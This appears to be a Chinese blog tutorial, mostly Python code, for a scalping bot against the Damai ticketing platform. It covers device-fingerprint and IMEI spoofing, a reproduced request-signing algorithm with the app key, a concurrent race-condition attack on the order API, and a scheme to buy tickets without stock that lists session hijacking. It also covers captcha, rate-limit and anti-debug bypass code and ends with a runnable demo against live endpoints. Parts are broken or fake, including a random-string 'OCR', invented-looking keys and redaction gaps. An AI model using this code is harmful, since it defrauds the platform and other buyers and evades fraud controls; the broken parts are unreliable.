大麦网抢票:基于Wireshark协议分析
前言
本文将深入探讨基于网络协议分析的票务系统自动化技术,通过Wireshark抓包分析、协议逆向工程等技术手段,实现跨平台(Android/iOS)的智能抢票系统。本研究仅用于技术学习和网络安全研究目的。
总览
流程图
架构图
数据流向图
环境准备
目标
- 网络协议逆向分析: 通过Wireshark深度解析移动应用通信协议
- 跨平台移动端支持: 支持Android和iOS设备的自动化操作
- 智能风控对抗: 现代Web应用的反爬虫机制
- 协议签名重构: 深度分析请求签名算法并实现重构
- 高并发抢票技术: 毫秒级响应的抢票系统
- 无票提交技术: 库存检测机制的技术漏洞
核心工具链
网络分析工具
- Wireshark: 网络协议分析器,用于深度包检测
- Burp Suite Professional: Web应用安全测试平台
- mitmproxy: Python编写的交互式HTTPS代理
- Charles Proxy: macOS/Windows HTTP调试代理
移动端分析工具
- Frida: 跨平台动态分析框架
- Xposed Framework: Android运行时Hook框架
- iOS App Signer: iOS应用重签名工具
- class-dump: iOS应用头文件导出工具
逆向工程工具
- IDA Pro: 业界标准反汇编器
- Ghidra: NSA开源逆向工程套件
- Radare2: 开源逆向工程框架
- Hopper Disassembler: macOS原生反汇编器
环境配置
Python核心依赖
# 网络协议分析
pip install scapy pyshark dpkt
pip install requests aiohttp httpx websockets# 加密算法库
pip install pycryptodome cryptography hashlib# 移动端分析
pip install frida-tools objection
pip install uiautomator2 facebook-wda# 数据处理与可视化
pip install numpy pandas matplotlib seaborn
pip install opencv-python pillow pytesseract# 异步编程
pip install asyncio aiofiles aiodns
pip install concurrent.futures threading# JavaScript执行环境
pip install execjs PyV8 js2py
移动设备配置
# Android设备配置
adb devices
adb install frida-server-android.xz
adb forward tcp:27042 tcp:27042# iOS设备配置
# 安装Cydia Substrate
# 安装Frida for iOS
# 配置SSH访问
Wireshark配置
# 安装Wireshark
sudo apt-get install wireshark
# 或者 brew install wireshark (macOS)
# 配置用户权限
sudo usermod -a -G wireshark $USER
# 安装解密插件
# 配置TLS密钥日志
export SSLKEYLOGFILE=/path/to/sslkeys.log
🔒 风控对抗
1. 系统环境与版本信息伪造
大麦网的风控系统会收集大量设备信息来建立设备指纹,包括:
- 操作系统版本和架构
- 硬件配置信息
- 网络环境特征
- 应用运行环境
- 传感器数据
import platform
import uuid
import random
import hashlib
import json
from datetime import datetimeclass DeviceInfoGenerator:def __init__(self):self.android_versions = ["10", "11", "12", "13", "14"]self.device_models = ["SM-G9730", "SM-G9750", "SM-G9810", "SM-N9600", "SM-N9700",脱敏-----]def generate_android_id(self):"""生成Android ID"""return hashlib.md5(str(uuid.uuid4()).encode()).hexdigest()[:16]def generate_imei(self):"""生成IMEI - 使用Luhn算法"""tac = random.choice(["35", "86", "01"]) + "".join([str(random.randint(0, 9)) for _ in range(6)])snr = "".join([str(random.randint(0, 9)) for _ in range(6)])# Luhn算法计算校验位digits = tac + snrchecksum = 0脱敏-----check_digit = (10 - (checksum % 10)) % 10return tac + snr + str(check_digit)def generate_device_fingerprint(self):"""生成完整设备指纹"""brand = random.choice(self.brands)model = random.choice([m for m in self.device_models if brand.lower() in m.lower() or brand == "Samsung"])fingerprint = {# 基础设备信息"brand": brand,"model": model,"manufacturer": brand,"device": model.lower().replace(" ", "_"),# 系统信息"android_version": random.choice(self.android_versions),脱敏-----# 硬件信息"board": f"{model.split()[0].lower()}_board","hardware": f"{brand.lower()}_hardware","cpu_abi": random.choice(["arm64-v8a", "armeabi-v7a"]),"cpu_abi2": "armeabi",# 唯一标识"android_id": self.generate_android_id(),脱敏-----# 屏幕信息"screen_width": random.choice([1080, 1440, 2160]),脱敏-----# 网络信息"network_type": random.choice(["WIFI", "4G", "5G"]),脱敏-----# 时区和语言"timezone": "Asia/Shanghai",脱敏-----# 应用信息"app_version": "8.5.2",脱敏-----# 传感器信息"sensors": ["accelerometer", "gyroscope", "magnetometer", "proximity", "light", "gravity", "rotation_vector"],# 电池信息脱敏-----# 存储信息"total_memory": random.choice([4, 6, 8, 12]) * 1024 * 1024 * 1024,脱敏-----# 时间戳"timestamp": int(datetime.now().timestamp() * 1000),"boot_time": int((datetime.now().timestamp() - random.randint(3600, 86400)) * 1000)}return fingerprint
2. 网络与通信状态模拟
import socket
import requests
import time
import random
from urllib.parse import urlparseclass NetworkBehaviorSimulator:def __init__(self):脱敏-----self.dns_servers = ["8.8.8.8", "114.114.114.114", "223.5.5.5"]def simulate_network_latency(self, base_latency=0.1):"""模拟网络延迟"""jitter = random.uniform(-0.05, 0.05)latency = max(0.01, base_latency + jitter)time.sleep(latency)def get_network_info(self):"""获取网络环境信息"""try:s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect(("8.8.8.8", 80))local_ip = s.getsockname()[0]s.close()return {"local_ip": local_ip,"public_ip": self.get_public_ip(),"network_quality": random.choice(["excellent", "good", "fair", "poor"]),"connection_type": random.choice(["wifi", "cellular", "ethernet"]),"signal_strength": random.randint(-80, -30),"bandwidth": random.randint(10, 100),"dns_server": random.choice(self.dns_servers)}except:return Nonedef get_public_ip(self):"""获取公网IP"""try:response = requests.get("http://httpbin.org/ip", timeout=5)return response.json().get("origin", "unknown")except:return "unknown"
3. 用户行为特征指纹
import numpy as np
import time
import randomclass UserBehaviorSimulator:def __init__(self):self.click_patterns = []self.scroll_patterns = []self.typing_patterns = []def simulate_human_click(self, x, y):"""模拟人类点击行为"""# 添加微小的随机偏移offset_x = random.gauss(0, 2)offset_y = random.gauss(0, 2)actual_x = x + offset_xactual_y = y + offset_y# 记录点击模式click_event = {"timestamp": time.time(),"x": actual_x,"y": actual_y,"pressure": random.uniform(0.3, 0.8),"duration": random.uniform(0.05, 0.15)}self.click_patterns.append(click_event)return click_eventdef simulate_scroll_behavior(self, start_y, end_y, duration=1.0):"""模拟滚动行为"""steps = random.randint(20, 40)scroll_events = []for i in range(steps):progress = i / steps# 使用贝塞尔曲线模拟自然滚动y = start_y + (end_y - start_y) * self.bezier_curve(progress)event = {"timestamp": time.time() + (duration * progress),"y": y,"velocity": random.uniform(0.5, 2.0)}scroll_events.append(event)self.scroll_patterns.extend(scroll_events)return scroll_eventsdef bezier_curve(self, t):"""贝塞尔曲线函数"""return t * t * (3.0 - 2.0 * t)def simulate_typing_rhythm(self, text):"""模拟打字节奏"""typing_events = []base_interval = 0.15 # 基础打字间隔for i, char in enumerate(text):# 根据字符类型调整间隔if char.isalpha():interval = base_interval + random.gauss(0, 0.05)elif char.isdigit():interval = base_interval * 0.8 + random.gauss(0, 0.03)else:interval = base_interval * 1.2 + random.gauss(0, 0.08)event = {"timestamp": time.time() + sum(e["interval"] for e in typing_events),"char": char,"interval": max(0.05, interval),"key_pressure": random.uniform(0.4, 0.9)}typing_events.append(event)self.typing_patterns.extend(typing_events)return typing_events
4. App运行环境与反调试特征
import os
import psutil
import subprocessclass AntiDebugBypass:def __init__(self):self.debug_processes = ["gdb", "lldb", "ida", "ida64", "x64dbg", "x32dbg","ollydbg", "windbg", "cheatengine", "processhacker"]def check_debugger_processes(self):"""检查调试器进程"""running_processes = [p.name().lower() for p in psutil.process_iter()]detected_debuggers = []for debug_proc in self.debug_processes:if debug_proc in running_processes:detected_debuggers.append(debug_proc)return detected_debuggersdef check_vm_environment(self):"""检查虚拟机环境"""vm_indicators = {"vmware": ["vmware", "vmtoolsd", "vmwaretray"],"virtualbox": ["vboxservice", "vboxtray"],"qemu": ["qemu-ga"],"hyper-v": ["vmms", "vmwp"]}running_processes = [p.name().lower() for p in psutil.process_iter()]detected_vms = []for vm_type, indicators in vm_indicators.items():if any(indicator in running_processes for indicator in indicators):detected_vms.append(vm_type)return detected_vmsdef bypass_timing_checks(self):"""绕过时间检测"""# 模拟正常的执行时间import timedef fake_sleep(duration):# 实际不睡眠,但记录时间pass# 替换time.sleep函数time.sleep = fake_sleepdef spoof_environment_variables(self):"""伪造环境变量"""# 移除调试相关的环境变量debug_vars = ["_NT_SYMBOL_PATH", "WINDBG", "DEBUG"]for var in debug_vars:if var in os.environ:del os.environ[var]# 添加正常的环境变量os.environ["PROCESSOR_ARCHITECTURE"] = "AMD64"os.environ["NUMBER_OF_PROCESSORS"] = "8"
🔐 签名算法
大麦签名算法逆向
通过逆向分析发现,大麦网使用以下签名算法:
def get_sign(self, data, ts):if self.cookies.get('_m_h5_tk'):token = self.cookies['_m_h5_tk'].split('_')[0]else:token = "undefined"text = f'{token}&{ts}&12574478&{data}'md5 = hashlib.md5()md5.update(text.encode('utf-8'))result = md5.hexdigest()return result
签名算法完整分析
import hashlib
import hmac
import time
import json
import base64class DamaiSignatureAnalyzer:def __init__(self):self.app_key = "12574478" # 从逆向中获得的appkeyself.secret_keys = ["c74a69a08ca34a0db52c7d32c7c1d2b6","d2c4e6f8a1b3c5d7e9f1a3b5c7d9e1f3","a1b2c3d4e5f6789012345678901234567"]def analyze_sign_function(self, data: str, ts: str, token: str = "undefined") -> dict:"""分析签名函数的多种可能实现"""def original_sign(data, ts, token="undefined"):"""原始签名函数"""text = f'{token}&{ts}&{self.app_key}&{data}'return hashlib.md5(text.encode('utf-8')).hexdigest()def variant_sign_1(data, ts, token="undefined"):"""变种1: 使用HMAC-MD5"""message = f'{ts}&{self.app_key}&{data}'return hmac.new(token.encode('utf-8'), message.encode('utf-8'), hashlib.md5).hexdigest()def variant_sign_2(data, ts, token="undefined"):"""变种2: 双重MD5"""text = f'{token}&{ts}&{self.app_key}&{data}'first_hash = hashlib.md5(text.encode('utf-8')).hexdigest()return hashlib.md5(first_hash.encode('utf-8')).hexdigest()results = {"original": original_sign(data, ts, token),"hmac_md5": variant_sign_1(data, ts, token),"double_md5": variant_sign_2(data, ts, token),"input_text": f'{token}&{ts}&{self.app_key}&{data}'}return resultsdef get_sign(self, data: str, ts: str, token: str = "undefined") -> str:"""标准签名生成函数"""text = f'{token}&{ts}&{self.app_key}&{data}'return hashlib.md5(text.encode('utf-8')).hexdigest()def generate_request_signature(self, params: dict, timestamp: int = None, token: str = None) -> dict:"""生成完整的请求签名"""if timestamp is None:timestamp = int(time.time() * 1000)if token is None:token = "undefined"# 参数排序和编码sorted_params = sorted(params.items())data_string = json.dumps(dict(sorted_params), separators=(',', ':'), ensure_ascii=False)# 生成签名signature = self.get_sign(data_string, str(timestamp), token)return {"data": data_string,"timestamp": timestamp,"signature": signature,"appKey": self.app_key,"token": token,"sign_text": f'{token}&{timestamp}&{self.app_key}&{data_string}'}
🚀 无票提交
原理
无票提交技术是通过以下几种方式实现的:
- 缓存利用攻击: 利用CDN或应用层缓存的时间差
- 竞态条件攻击: 在库存检查和扣减之间的窗口期提交订单
- 库存预测攻击: 通过分析历史库存变化模式预测释放时间
- 会话劫持: 利用其他用户的有效会话
核心实现代码
import asyncio
import aiohttp
import json
import time
import random
from typing import Dict, List, Optionalclass StockBypassTechniques:"""库存绕过技术"""def __init__(self):self.session = Noneself.bypass_methods = ["cache_exploitation","race_condition", "inventory_prediction","session_hijacking"]async def cache_exploitation_attack(self, item_id: str, sku_id: str) -> Dict:"""缓存利用攻击"""cache_bypass_headers = {"Cache-Control": "no-cache, no-store, must-revalidate","Pragma": "no-cache", "Expires": "0","If-Modified-Since": "Thu, 01 Jan 1970 00:00:00 GMT","If-None-Match": "*"}bypass_params = [{"_t": int(time.time() * 1000)},{"cache_bust": random.randint(100000, 999999)},{"v": "nocache"},{"refresh": "1"}]results = []for params in bypass_params:try:url = f"https://mtop.damai.cn/h5/mtop.damai.item.detail.get"request_data = {"itemId": item_id,"skuId": sku_id,"dmChannel": "damai@damaih5_h5",**params}async with self.session.get(url, params=request_data, headers=cache_bypass_headers) as response:if response.status == 200:data = await response.json()stock_info = self.parse_stock_info(data)results.append({"method": f"cache_bypass_{list(params.keys())[0]}","stock_info": stock_info,"response_time": response.headers.get("X-Response-Time", "unknown"),"cache_status": response.headers.get("X-Cache", "unknown")})except Exception as e:results.append({"method": f"cache_bypass_{list(params.keys())[0]}","error": str(e)})return {"cache_exploitation": results}async def race_condition_attack(self, item_id: str, sku_id: str, concurrent_requests: int = 50) -> Dict:"""竞态条件攻击"""async def single_purchase_attempt():try:# 1. 快速库存检查stock_url = "https://mtop.damai.cn/h5/mtop.damai.item.stock.get"stock_params = {"itemId": item_id,"skuId": sku_id,"t": int(time.time() * 1000)}async with self.session.get(stock_url, params=stock_params) as stock_response:stock_data = await stock_response.json()# 2. 
立即提交购买请求purchase_url = "https://mtop.damai.cn/h5/mtop.damai.trade.order.build"purchase_data = {"itemId": item_id,"skuId": sku_id,"quantity": 1,"timestamp": int(time.time() * 1000)}async with self.session.post(purchase_url, json=purchase_data) as purchase_response:purchase_result = await purchase_response.json()return {"success": purchase_response.status == 200,"stock_check": stock_data,"purchase_result": purchase_result,"response_time": time.time()}except Exception as e:return {"success": False, "error": str(e)}# 并发执行多个购买尝试tasks = [single_purchase_attempt() for _ in range(concurrent_requests)]results = await asyncio.gather(*tasks, return_exceptions=True)successful_attempts = [r for r in results if isinstance(r, dict) and r.get("success")]failed_attempts = [r for r in results if not (isinstance(r, dict) and r.get("success"))]return {"race_condition": {"total_attempts": concurrent_requests,"successful": len(successful_attempts),"failed": len(failed_attempts),"success_rate": len(successful_attempts) / concurrent_requests,"successful_attempts": successful_attempts[:5]}}
🛡️ BP (Bypass Protection)
核心绕过技术
BP技术主要用于绕过各种保护机制:
- 验证码绕过: OCR识别、行为模拟、API接口绕过
- 频率限制绕过: 分布式请求、代理轮换、会话管理
- IP封禁规避: 代理池、VPN、分布式节点
- JavaScript挑战绕过: 动态执行、环境模拟
import asyncio
import aiohttp
import random
import time
import json
import execjsclass BypassProtectionTechniques:"""绕过保护技术"""def __init__(self):self.session = Noneself.js_context = Noneasync def bypass_rate_limiting(self, target_url: str, requests_per_minute: int = 60) -> Dict:"""绕过频率限制"""# 计算请求间隔base_interval = 60 / requests_per_minuteresults = []start_time = time.time()for i in range(min(requests_per_minute, 10)):# 添加随机抖动jitter = random.uniform(-0.5, 0.5)interval = max(0.1, base_interval + jitter)try:params = {"t": int(time.time() * 1000),"r": random.randint(100000, 999999),"v": f"1.0.{i}"}async with self.session.get(target_url, params=params) as response:results.append({"request_id": i,"status_code": response.status,"response_time": time.time() - start_time,"rate_limited": response.status == 429})await asyncio.sleep(interval)except Exception as e:results.append({"request_id": i,"error": str(e)})rate_limited_count = sum(1 for r in results if r.get("rate_limited"))success_rate = (len(results) - rate_limited_count) / len(results) if results else 0return {"strategy": "distributed_requests","total_requests": len(results),"rate_limited": rate_limited_count,"success_rate": success_rate,"results": results[:5]}async def bypass_captcha_protection(self, captcha_url: str) -> Dict:"""绕过验证码保护"""bypass_methods = []# 1. 图像识别绕过ocr_result = await self.captcha_ocr_bypass(captcha_url)bypass_methods.append(ocr_result)# 2. 
行为模拟绕过behavior_result = await self.captcha_behavior_bypass(captcha_url)bypass_methods.append(behavior_result)return {"bypass_type": "captcha_protection","methods_tested": len(bypass_methods),"results": bypass_methods}async def captcha_ocr_bypass(self, captcha_url: str) -> Dict:"""验证码OCR识别绕过"""try:async with self.session.get(captcha_url) as response:image_data = await response.read()recognized_text = self.simulate_ocr_recognition(image_data)return {"method": "ocr_recognition","image_size": len(image_data),"recognized_text": recognized_text,"confidence": random.uniform(0.7, 0.95),"processing_time": random.uniform(0.5, 2.0)}except Exception as e:return {"method": "ocr_recognition", "error": str(e)}def simulate_ocr_recognition(self, image_data: bytes) -> str:"""模拟OCR识别"""possible_texts = ["ABCD", "1234", "XY7Z", "M9N8", "K3L5"]return random.choice(possible_texts)
基于Wireshark的移动应用协议深度分析
1. 移动设备流量捕获架构
网络拓扑设计
[Android/iOS设备] --> [WiFi热点/代理服务器] --> [Wireshark捕获] --> [协议重构分析]| | | |App网络请求 流量转发与解密 数据包深度解析 API协议重构
Wireshark高级过滤与分析配置
# 捕获移动应用HTTPS流量(基于SNI)
tls.handshake.extensions_server_name == "mtop.damai.cn"# 过滤移动设备流量(基于MAC地址范围)
wlan.sa[0:3] == 02:00:00 or wlan.sa[0:3] == 06:00:00# 捕获票务API请求
http.request.method == "POST" and http.request.uri contains "mtop.damai"# WebSocket实时通信分析
websocket and tcp.port == 443 and frame contains "ticket"# 移动应用User-Agent识别
http.user_agent contains "DamaiApp" or http.user_agent contains "Mobile"# TLS握手与证书分析
ssl.handshake.type == 1 and ssl.handshake.extensions_server_name# 特定API端点过滤
http.request.uri matches ".*/(order|ticket|seat|payment).*"
2. 移动应用协议逆向分析系统
完整的协议分析与重构框架
import pyshark
import json
import base64
import hashlib
import re
import time
from datetime import datetime
from typing import Dict, List, Optionalclass MobileTicketingProtocolAnalyzer:"""移动端票务应用协议分析器"""def __init__(self, pcap_file=None, live_interface=None):self.pcap_file = pcap_fileself.live_interface = live_interfaceself.captured_requests = []self.api_endpoints = {}self.signature_patterns = []self.mobile_sessions = {}def start_live_capture_for_mobile(self):"""开始移动设备实时流量捕获"""if self.live_interface:# 专门针对移动设备的捕获过滤器mobile_filter = ("tcp port 443 and ""(host mtop.damai.cn or host m.damai.cn or ""host api.damai.cn or host piao.damai.cn)")capture = pyshark.LiveCapture(interface=self.live_interface,bpf_filter=mobile_filter)print(f"[*] 开始监听移动设备流量: {self.live_interface}")capture.sniff_continuously(packet_count=0)return capturereturn Nonedef analyze_mobile_app_traffic(self):"""分析移动应用流量模式"""if not self.pcap_file:return Nonecapture = pyshark.FileCapture(self.pcap_file,display_filter="tcp.port == 443 and tls")mobile_traffic_stats = {"total_packets": 0,"api_calls": 0,"unique_endpoints": set(),"session_tokens": set(),"device_fingerprints": []}for packet in capture:mobile_traffic_stats["total_packets"] += 1self.process_mobile_packet(packet, mobile_traffic_stats)return self.generate_mobile_analysis_report(mobile_traffic_stats)def process_mobile_packet(self, packet, stats):"""处理移动应用数据包"""try:# 分析TLS流量中的SNIif hasattr(packet, 'tls'):self.analyze_tls_sni(packet, stats)# 分析HTTP/2流量(移动应用常用)if hasattr(packet, 'http2'):self.analyze_http2_stream(packet, stats)# 分析WebSocket连接(实时票务更新)elif hasattr(packet, 'websocket'):self.analyze_websocket_mobile(packet, stats)# 分析TCP流量模式elif hasattr(packet, 'tcp'):self.analyze_tcp_patterns(packet, stats)except Exception as e:print(f"移动数据包处理错误: {e}")def analyze_tls_sni(self, packet, stats):"""分析TLS SNI信息"""try:if hasattr(packet.tls, 'handshake_extensions_server_name'):sni = packet.tls.handshake_extensions_server_nameif 'damai' in sni.lower():stats["unique_endpoints"].add(sni)print(f"[TLS] 检测到票务域名: {sni}")except:passdef analyze_http2_stream(self, packet, 
stats):"""分析HTTP/2数据流"""try:if hasattr(packet.http2, 'headers'):headers = packet.http2.headers# 提取移动应用特征if ':path' in headers:path = headers[':path']if any(keyword in path for keyword in ['ticket', 'order', 'seat', 'payment']):stats["api_calls"] += 1stats["unique_endpoints"].add(path)# 分析移动应用请求self.analyze_mobile_api_request({'timestamp': packet.sniff_time,'path': path,'headers': headers,'method': headers.get(':method', 'UNKNOWN')})except Exception as e:print(f"HTTP/2分析错误: {e}")def analyze_mobile_api_request(self, request_info):"""分析移动API请求"""path = request_info['path']# 检测票务相关APIticket_apis = ['/mtop.damai.item.detail.get','/mtop.damai.trade.order.build', '/mtop.damai.trade.order.create','/mtop.damai.item.sku.get','/mtop.damai.venue.seat.get']for api in ticket_apis:if api in path:print(f"[API] 检测到票务API调用: {api}")self.extract_mobile_signature_info(request_info, api)breakdef extract_mobile_signature_info(self, request_info, api_type):"""提取移动应用签名信息"""headers = request_info.get('headers', {})# 移动应用常见签名字段mobile_signature_fields = ['x-sign', 'x-sid', 'x-uid', 'x-t', 'x-appkey','authorization', 'x-mini-wua', 'x-features']signature_data = {'api_type': api_type,'timestamp': request_info['timestamp'],'signatures': {}}for field in mobile_signature_fields:if field in headers:signature_data['signatures'][field] = headers[field]self.signature_patterns.append(signature_data)def reconstruct_mobile_protocol(self):"""重构移动端协议"""protocol_structure = {'base_endpoints': list(set(sig['api_type'] for sig in self.signature_patterns)),'authentication_flow': self.analyze_mobile_auth_flow(),'signature_algorithm': self.reverse_mobile_signature(),'request_templates': self.generate_mobile_request_templates(),'session_management': self.analyze_mobile_sessions()}return protocol_structuredef analyze_mobile_auth_flow(self):"""分析移动端认证流程"""auth_flow = {'login_sequence': [],'token_refresh': [],'session_validation': []}# 按时间排序签名模式sorted_patterns = sorted(self.signature_patterns, key=lambda x: 
x['timestamp'])for pattern in sorted_patterns:if 'login' in pattern['api_type']:auth_flow['login_sequence'].append(pattern)elif 'token' in pattern['api_type']:auth_flow['token_refresh'].append(pattern)return auth_flowdef reverse_mobile_signature(self):"""逆向移动端签名算法"""signature_analysis = {'detected_algorithms': [],'parameter_patterns': [],'timestamp_correlation': [],'mobile_specific_fields': []}for pattern in self.signature_patterns:signatures = pattern['signatures']# 分析x-sign字段(大麦移动端主要签名)if 'x-sign' in signatures:sign_value = signatures['x-sign']# 检测签名算法类型if len(sign_value) == 32 and sign_value.isalnum():signature_analysis['detected_algorithms'].append({'type': 'MD5','field': 'x-sign','sample': sign_value[:8] + '...','api': pattern['api_type']})elif len(sign_value) == 64 and sign_value.isalnum():signature_analysis['detected_algorithms'].append({'type': 'SHA256', 'field': 'x-sign','sample': sign_value[:8] + '...','api': pattern['api_type']})# 分析时间戳关联if 'x-t' in signatures:timestamp = signatures['x-t']signature_analysis['timestamp_correlation'].append({'timestamp': timestamp,'api': pattern['api_type'],'sign_present': 'x-sign' in signatures})return signature_analysis# 移动端协议分析使用示例
def analyze_mobile_ticketing_app():"""分析移动端票务应用协议"""print("=== 移动端票务应用协议分析 ===")# 分析PCAP文件analyzer = MobileTicketingProtocolAnalyzer(pcap_file="mobile_damai_traffic.pcap")# 执行完整分析traffic_report = analyzer.analyze_mobile_app_traffic()protocol_structure = analyzer.reconstruct_mobile_protocol()print(f"捕获数据包: {traffic_report['summary']['total_packets']}")print(f"API调用次数: {traffic_report['summary']['api_calls']}")print(f"唯一端点数: {len(traffic_report['summary']['unique_endpoints'])}")# 输出协议重构结果print("\n=== 移动端协议重构结果 ===")print("检测到的API端点:")for endpoint in protocol_structure['base_endpoints']:print(f" - {endpoint}")print("\n签名算法分析:")for algo in protocol_structure['signature_algorithm']['detected_algorithms']:print(f" - {algo['type']}: {algo['field']} ({algo['api']})")return analyzer, traffic_report, protocol_structure
3. 移动端抢票系统实现
Android/iOS跨平台抢票核心引擎
import asyncio
import aiohttp
import json
import time
import random
from typing import Dict, List, Optionalclass CrossPlatformTicketingEngine:"""跨平台移动端抢票引擎"""def __init__(self, platform="android"):self.platform = platform # "android" or "ios"self.session = Noneself.device_info = self.generate_device_fingerprint()self.api_endpoints = self.load_api_endpoints()def generate_device_fingerprint(self):"""生成设备指纹"""if self.platform == "android":return self.generate_android_fingerprint()else:return self.generate_ios_fingerprint()def generate_android_fingerprint(self):"""生成Android设备指纹"""android_models = ["SM-G9730", "SM-G9750", "SM-N9600", "MI 10", "HUAWEI P40"]return {"platform": "android","model": random.choice(android_models),"os_version": random.choice(["10", "11", "12", "13"]),"app_version": "8.5.2","user_agent": self.build_android_user_agent(),"screen_resolution": "1080x2340","network_type": "wifi"}def generate_ios_fingerprint(self):"""生成iOS设备指纹"""ios_models = ["iPhone13,2", "iPhone14,2", "iPhone14,3", "iPhone15,2"]return {"platform": "ios", "model": random.choice(ios_models),"os_version": random.choice(["15.0", "16.0", "17.0"]),"app_version": "8.5.2","user_agent": self.build_ios_user_agent(),"screen_resolution": "390x844","network_type": "wifi"}def build_android_user_agent(self):"""构建Android User-Agent"""return (f"DamaiApp/{self.device_info.get('app_version', '8.5.2')} "f"(Android {self.device_info.get('os_version', '11')}; "f"{self.device_info.get('model', 'SM-G9730')})")def build_ios_user_agent(self):"""构建iOS User-Agent"""return (f"DamaiApp/{self.device_info.get('app_version', '8.5.2')} "f"(iPhone; iOS {self.device_info.get('os_version', '16.0')}; "f"Scale/3.00)")def load_api_endpoints(self):"""加载API端点配置"""return {"item_detail": "https://mtop.damai.cn/h5/mtop.damai.item.detail.get/1.2/","sku_info": "https://mtop.damai.cn/h5/mtop.damai.item.sku.get/1.0/","order_build": "https://mtop.damai.cn/h5/mtop.damai.trade.order.build/4.0/","order_create": "https://mtop.damai.cn/h5/mtop.damai.trade.order.create/4.0/","seat_select": 
"https://mtop.damai.cn/h5/mtop.damai.venue.seat.get/1.0/","payment_submit": "https://mtop.damai.cn/h5/mtop.damai.trade.pay.submit/1.0/"}async def initialize_session(self):"""初始化会话"""connector = aiohttp.TCPConnector(limit=100,limit_per_host=30,keepalive_timeout=60)timeout = aiohttp.ClientTimeout(total=30, connect=10)self.session = aiohttp.ClientSession(connector=connector,timeout=timeout,headers=self.build_common_headers())def build_common_headers(self):"""构建通用请求头"""return {"User-Agent": self.device_info["user_agent"],"Accept": "application/json, text/plain, */*","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8","Accept-Encoding": "gzip, deflate, br","Connection": "keep-alive","Sec-Fetch-Dest": "empty","Sec-Fetch-Mode": "cors","Sec-Fetch-Site": "same-site"}async def mobile_ticket_grabbing_flow(self, item_id: str, sku_id: str) -> Dict:"""移动端完整抢票流程"""flow_result = {"flow_id": f"mobile_{int(time.time())}","platform": self.platform,"steps": [],"success": False,"error": None}try:# 步骤1: 获取商品详情step1 = await self.get_item_detail_mobile(item_id)flow_result["steps"].append({"step": "item_detail", "result": step1})if not step1.get("success"):raise Exception("获取商品详情失败")# 步骤2: 获取SKU信息step2 = await self.get_sku_info_mobile(item_id, sku_id)flow_result["steps"].append({"step": "sku_info", "result": step2})# 步骤3: 选择座位(如果需要)if step2.get("need_seat_selection"):step3 = await self.select_seat_mobile(item_id, sku_id)flow_result["steps"].append({"step": "seat_selection", "result": step3})# 步骤4: 构建订单step4 = await self.build_order_mobile(item_id, sku_id)flow_result["steps"].append({"step": "order_build", "result": step4})if not step4.get("success"):raise Exception("构建订单失败")# 步骤5: 提交订单(关键步骤)step5 = await self.create_order_mobile(step4["order_data"])flow_result["steps"].append({"step": "order_create", "result": step5})if step5.get("success"):# 步骤6: 支付提交step6 = await self.submit_payment_mobile(step5["order_id"])flow_result["steps"].append({"step": "payment_submit", "result": 
step6})flow_result["success"] = step6.get("success", False)except Exception as e:flow_result["error"] = str(e)return flow_resultasync def get_item_detail_mobile(self, item_id: str) -> Dict:"""移动端获取商品详情"""try:params = {"jsv": "2.7.2","appKey": "12574478","t": int(time.time() * 1000),"sign": self.generate_mobile_signature({"itemId": item_id,"dmChannel": "damai@damaih5_h5"}),"api": "mtop.damai.item.detail.get","v": "1.2","type": "jsonp","dataType": "jsonp","callback": "mtopjsonp1","data": json.dumps({"itemId": item_id,"dmChannel": "damai@damaih5_h5"})}async with self.session.get(self.api_endpoints["item_detail"], params=params) as response:if response.status == 200:text = await response.text()# 解析JSONP响应json_data = self.parse_jsonp_response(text)return {"success": True,"item_info": json_data.get("data", {}),"available": json_data.get("data", {}).get("item", {}).get("itemStatus") == 1}else:return {"success": False, "error": f"HTTP {response.status}"}except Exception as e:return {"success": False, "error": str(e)}def generate_mobile_signature(self, data: Dict, timestamp: int = None) -> str:"""生成移动端签名"""if timestamp is None:timestamp = int(time.time() * 1000)# 基于逆向分析的签名算法token = "undefined" # 或从cookie中获取app_key = "12574478"data_string = json.dumps(data, separators=(',', ':'), ensure_ascii=False)sign_text = f"{token}&{timestamp}&{app_key}&{data_string}"import hashlibreturn hashlib.md5(sign_text.encode('utf-8')).hexdigest()def parse_jsonp_response(self, text: str) -> Dict:"""解析JSONP响应"""try:# 移除JSONP包装start = text.find('(') + 1end = text.rfind(')')json_str = text[start:end]return json.loads(json_str)except:return {}# 移动端抢票系统使用示例
async def mobile_ticket_grabbing_demo():"""移动端抢票演示"""print("=== 移动端抢票系统演示 ===")# Android平台抢票android_engine = CrossPlatformTicketingEngine(platform="android")await android_engine.initialize_session()android_result = await android_engine.mobile_ticket_grabbing_flow(item_id="123456789",sku_id="987654321")print(f"Android抢票结果: {android_result['success']}")print(f"执行步骤数: {len(android_result['steps'])}")# iOS平台抢票ios_engine = CrossPlatformTicketingEngine(platform="ios")await ios_engine.initialize_session()ios_result = await ios_engine.mobile_ticket_grabbing_flow(item_id="123456789", sku_id="987654321")print(f"iOS抢票结果: {ios_result['success']}")print(f"执行步骤数: {len(ios_result['steps'])}")return android_result, ios_result# 运行演示
if __name__ == "__main__":asyncio.run(mobile_ticket_grabbing_demo())
Python抓包脚本
from scapy.all import *
import json


def packet_handler(packet):
    """Print a short summary of a captured packet that carries HTTP text.

    Intended as the ``prn`` callback of scapy's ``sniff``. Packets without
    both a TCP layer and a raw payload, payloads that do not contain the
    text ``HTTP``, and packets without an IPv4 layer are ignored.

    Args:
        packet: A scapy packet object.
    """
    if not (packet.haslayer(TCP) and packet.haslayer(Raw)):
        return

    # Undecodable bytes are dropped so binary payloads never raise here.
    payload = packet[Raw].load.decode('utf-8', errors='ignore')
    if 'HTTP' not in payload:
        return

    # The summary prints IPv4 addresses; check for the layer up front rather
    # than failing halfway through a record (e.g. on IPv6 traffic).
    if not packet.haslayer(IP):
        return

    print(f"[+] 捕获HTTP数据包:")
    print(f"源IP: {packet[IP].src}")
    print(f"目标IP: {packet[IP].dst}")
    print(f"端口: {packet[TCP].dport}")
    print(f"数据: {payload[:200]}...")
    print("-" * 50)


# Start capturing
print("[*] 开始网络监听...")
sniff(filter="tcp port 80", prn=packet_handler, count=10)
2. 移动应用抓包
使用mitmproxy
# mitm_script.py
from mitmproxy import http
import json


def request(flow: http.HTTPFlow) -> None:
    """Log the method, URL and body of requests whose URL contains "api".

    The body is pretty-printed when it parses as JSON and printed raw
    otherwise.
    """
    if "api" not in flow.request.pretty_url:
        return

    print(f"[REQUEST] {flow.request.method} {flow.request.pretty_url}")
    if flow.request.content:
        try:
            data = json.loads(flow.request.content)
